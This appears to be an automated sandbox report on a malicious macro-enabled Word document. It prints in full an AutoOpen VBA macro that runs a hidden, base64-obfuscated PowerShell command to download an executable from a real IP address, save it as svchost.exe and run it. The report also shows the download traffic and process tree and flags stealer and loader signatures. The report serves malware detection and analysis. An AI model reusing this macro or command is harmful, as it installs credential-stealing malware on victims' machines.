        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
        • ZIP compressed archive (8000/1) 5.84%
        File name: 472.rtf.doc
        File size:108'643 bytes
        MD5:0bd1328012301d04bdc921acb321b820
        SHA1:724612a3c88f187aa000efe4ff4e9e04c9553696
        SHA256:7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
        SHA512:d588760ba4fb450a41563849ec10da311ef317c80da1e816b5d88198aef35379fd15f63512620fa7514f7d46f719afc07bce5fff7690ae6336e5a7d747e7d22f
        SSDEEP:1536:FCuLaHmmF7tG8Q/qk8fowr/5mUpKNEteuEC5/ThAoLCAJZSfx6BrqbyGfh:hLIt7tD/rRmCK6guEC5/ThAQSfxSuGQ
        TLSH:48B349138C0C9B87E02D47F9BE071D9E7A6A475CED8279FE00521ECB7E412524D8A96F
        File Content Preview:PK..........!...e.....^.......[Content_Types].xml ...(.........................................................................................................................................................................................................
        Icon Hash:2764a3aaaeb7bdbf
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Author:wolf
        Template:Normal.dotm
        Last Saved By:wolf
        Revision Number:3
        Total Edit Time:1
        Create Time:2024-05-23T00:18:00Z
        Last Saved Time:2024-05-23T00:22:00Z
        Number of Pages:1
        Number of Words:0
        Number of Characters:1
        Creating Application:Microsoft Office Word
        Security:0
        Number of Lines:1
        Number of Paragraphs:1
        Thumbnail Scaling Desired:false
        Company:
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0000
        General
        Stream Path:VBA/NewMacros
        VBA File Name:NewMacros.bas
        Stream Size:2099
        Attribute VB_Name = "NewMacros"
        Sub AutoOpen()
            Application.ScreenUpdating = False
            Dim Program As Integer
            Dim cmdStr As String
            cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
            Program = Shell(cmdStr, vbHide)
            Application.ScreenUpdating = True
        End Sub
        

        General
        Stream Path:VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:938
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s .
        Data Raw:01 16 03 00 00 f0 00 00 00 ac 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff b3 02 00 00 07 03 00 00 00 00 00 00 01 00 00 00 b7 f8 2a 92 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "ThisDocument"
        Attribute VB_Base = "1Normal.ThisDocument"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = True
        Attribute VB_Customizable = True
        

        General
        Stream Path:PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:419
        Entropy:5.3793990619995125
        Base64 Encoded:True
        Data ASCII:I D = " { 7 F 4 D 6 A 6 6 - 1 9 0 E - 4 8 F 7 - 9 1 8 1 - E B C D 5 6 C B F 3 E 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 A 6 8 7 E 1 6 E C 1 A E C 1 A E C 1 A E C 1 A " . . D P B = " D 4 D 6 C 0 8 0 4 0 E B 4 1 E B 4 1 E B " . . G C = " 3 E 3 C 2 A 3 A F E C E 6 9 C F 6 9 C F 9 6 " . . . .
        Data Raw:49 44 3d 22 7b 37 46 34 44 36 41 36 36 2d 31 39 30 45 2d 34 38 46 37 2d 39 31 38 31 2d 45 42 43 44 35 36 43 42 46 33 45 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
        General
        Stream Path:PROJECTwm
        CLSID:
        File Type:data
        Stream Size:71
        Entropy:3.3485999524807437
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
        General
        Stream Path:VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2637
        Entropy:4.087205229304595
        Base64 Encoded:False
        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
        Data Raw:cc 61 b5 00 00 03 00 ff 00 0c 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        General
        Stream Path:VBA/dir
        CLSID:
        File Type:data
        Stream Size:568
        Entropy:6.316541798842935
        Base64 Encoded:True
        Data ASCII:. 4 . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . d . ^ h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . J . m ! O f f i c g O . f . i . c g . .
        Data Raw:01 34 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 64 0e 5e 68 09 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
        • 45.84.0.173
        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        0 | 192.168.2.22 | 49161 | 45.84.0.173 | 80 | 3084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Timestamp | Bytes transferred | Direction | Data
        May 23, 2024 20:15:10.500318050 CEST | 83 | OUT | GET /download_22/server.exe HTTP/1.1
        Host: 45.84.0.173
        Connection: Keep-Alive
        May 23, 2024 20:15:11.277391911 CEST | 1236 | IN | HTTP/1.1 200 OK
        Date: Thu, 23 May 2024 18:15:11 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Tue, 21 May 2024 06:39:08 GMT
        ETag: "2d000-618f1132a7b00"
        Accept-Ranges: bytes
        Content-Length: 184320
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdos-program
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 af 24 42 6c eb 45 2c 3f eb 45 2c 3f eb 45 2c 3f 56 0a ba 3f ea 45 2c 3f f5 17 a8 3f f4 45 2c 3f f5 17 b9 3f fb 45 2c 3f f5 17 af 3f 89 45 2c 3f cc 83 57 3f ec 45 2c 3f eb 45 2d 3f 86 45 2c 3f f5 17 a6 3f ea 45 2c 3f f5 17 b8 3f ea 45 2c 3f f5 17 bd 3f ea 45 2c 3f 52 69 63 68 eb 45 2c 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00 00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 [TRUNCATED]
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$BlE,?E,?E,?V?E,??E,??E,??E,?W?E,?E-?E,??E,??E,??E,?RichE,?PELJd,@$P.text `.rdatafjl@@.data\.@.rsrc.@@

        Target ID:0
        Start time:14:15:02
        Start date:23/05/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fbe0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:14:15:03
        Start date:23/05/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Imagebase:0x4a300000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:14:15:03
        Start date:23/05/2024
        Path:C:\Windows\System32\timeout.exe
        Wow64 process (32bit):false
        Commandline:timeout 3
        Imagebase:0xff720000
        File size:33'280 bytes
        MD5 hash:68A0A50CCAD87E1EE1944410A96D066C
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:5
        Start time:14:15:06
        Start date:23/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Imagebase:0x13f700000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:6
        Start time:14:15:08
        Start date:23/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
        Imagebase:0x13f700000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:7
        Start time:14:15:11
        Start date:23/05/2024
        Path:C:\Users\user\AppData\Local\Temp\svchost.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
        Imagebase:0x400000
        File size:184'320 bytes
        MD5 hash:92C57DD80B764A028749520017D44E76
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 92%, ReversingLabs
        Reputation:low
        Has exited:true

        Call Graph

        AutoOpen -> Shell (1 call), vbHide (1 reference)

        Module: NewMacros

        Declaration
        Attribute VB_Name = "NewMacros"

        APIs: ScreenUpdating, Shell, vbHide
        Meta Information: Shell("cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;",0) -> 1408
        Decrypted Strings: "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"

        Instructions (meta information from the sandbox trace shown as trailing comments)
        Sub AutoOpen()
            Application.ScreenUpdating = False          ' ScreenUpdating; executed
            Dim Program as Integer
            Dim cmdStr as String
            cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
            Program = Shell(cmdStr, vbHide)             ' Shell(cmdStr, 0) -> 1408; vbHide; executed
            Application.ScreenUpdating = True           ' ScreenUpdating
        End Sub

        Module: ThisDocument

        Declaration
        Attribute VB_Name = "ThisDocument"
        Attribute VB_Base = "1Normal.ThisDocument"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = True
        Attribute VB_Customizable = True

          Memory Dump Source
          • Source File: 00000006.00000002.360908253.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_7fe898b0000_powershell.jbxd
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.360908253.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_7fe898b0000_powershell.jbxd
          Similarity
          • String ID: 6s$(U|$(U|$(U|$(U|$(U|$(U|
          • API String ID: 0-3889620081

          Execution Graph

          Execution Coverage:3.7%
          Dynamic/Decrypted Code Coverage:86.4%
          Signature Coverage:36.4%
          Total number of Nodes:44
          Total number of Limit Nodes:2
          Execution graph (node address, API calls made in that node, successors; 44 nodes as counted above):
          • 220001 -> 220005 -> 22092b GetPEB -> 220972 -> 220030 -> 22003c -> 220049 -> 220e0f (3 API calls) -> 220223 -> 220d90 GetPEB -> 220238
          • 220005 -> 22092b GetPEB -> 220030 -> 22003c (4 API calls) -> 220038
          • 4015f7 -> 40512a -> 40515c GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter -> 405153 -> 4015fc (loops on itself); 40512a -> 40514f -> 40515c / 405153
          • 22003c -> 220049 -> 220e0f SetErrorMode SetErrorMode -> 220e26 ExitProcess; 220e0f -> 220223 -> 220d90 -> 220dad -> 220dbb GetPEB -> 220db6 -> 220238; 220dad -> 220db6
          • 244b76b -> 244b77a -> 244bf0b -> 244bf26 -> 244bf2f CreateToolhelp32Snapshot -> 244bf26 / 244bf4b Module32First; 244bf26 -> 244bf4b -> 244b783 / 244bf5a -> 244bbca -> 244bbf5 -> 244bc06 VirtualAlloc -> 244bc3e (loops on itself); 244bbf5 -> 244bc3e

          Control-flow Graph

          APIs
          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0244BF33
          • Module32First.KERNEL32(00000000,00000224), ref: 0244BF53
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CreateFirstModule32SnapshotToolhelp32
          • API String ID: 3833638111-0

          Control-flow Graph

          Basic blocks (address range, API calls, successors):
          • 220e0f-220e24: SetErrorMode * 2 -> 220e26-220e28: ExitProcess
          • 220e0f-220e24 -> 220e2b-220e2c
          APIs
          • SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E19
          • SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E1E
          • ExitProcess.KERNELBASE(00000000,?,00220223,?,?), ref: 00220E28
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ErrorMode$ExitProcess
          • API String ID: 1912810149-0

          Control-flow Graph

          Basic blocks (address range, API calls, successors):
          • 244bbca-244bc04: call 244bedd -> 244bc06-244bc39: VirtualAlloc, call 244bc57 -> 244bc3e-244bc50 -> 244bc52 (loops on itself)
          • 244bbca-244bc04 -> 244bc52
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0244BC1B
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • API String ID: 4275171209-0

          Control-flow Graph

          Basic blocks (address range, API calls, successors):
          • 22092b-220970: GetPEB -> 220972-220978 -> 22097a-22098a: call 220d35 -> 22098c-22098e -> 220972-220978 (loop); 220972-220978 -> 22098c-22098e
          • 22097a-22098a -> 220992-220994 -> 220996-220998 -> 220a3b-220a3e; 22098c-22098e -> 220990 -> 220996-220998
          • 220992-220994 -> 22099d-2209d3 -> 2209dc-2209ee: call 220d0c -> 2209f0-220a3a -> 220a3b-220a3e; 2209dc-2209ee -> 2209d5-2209d8 -> 2209dc-2209ee (loop)
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches
          Similarity
          • String ID: .$GetProcAddress.$l
          • API String ID: 0-2784972518
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches